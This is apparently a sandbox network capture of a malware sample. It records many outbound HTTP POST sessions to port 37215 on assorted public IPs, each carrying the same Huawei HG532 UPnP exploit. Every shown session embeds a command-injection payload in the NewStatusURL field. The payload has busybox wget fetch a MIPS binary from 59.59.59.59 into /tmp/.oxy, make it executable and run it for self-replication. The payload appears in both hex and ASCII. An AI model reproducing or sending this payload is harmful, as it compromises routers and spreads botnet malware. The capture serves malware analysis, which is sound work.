                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2097192.168.2.1535870157.156.68.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.067527056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2098192.168.2.1556270103.211.224.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.067545891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2099192.168.2.153332641.139.55.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.073093891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2100192.168.2.1548636197.106.221.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.078366995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2101192.168.2.1541928157.80.157.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.078386068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2102192.168.2.1544752157.254.134.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.078433990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2103192.168.2.153801641.23.241.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.078505039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2104192.168.2.1553500191.222.166.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.078528881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2105192.168.2.154363241.155.250.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.078552961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2106192.168.2.155633841.230.202.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.078571081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 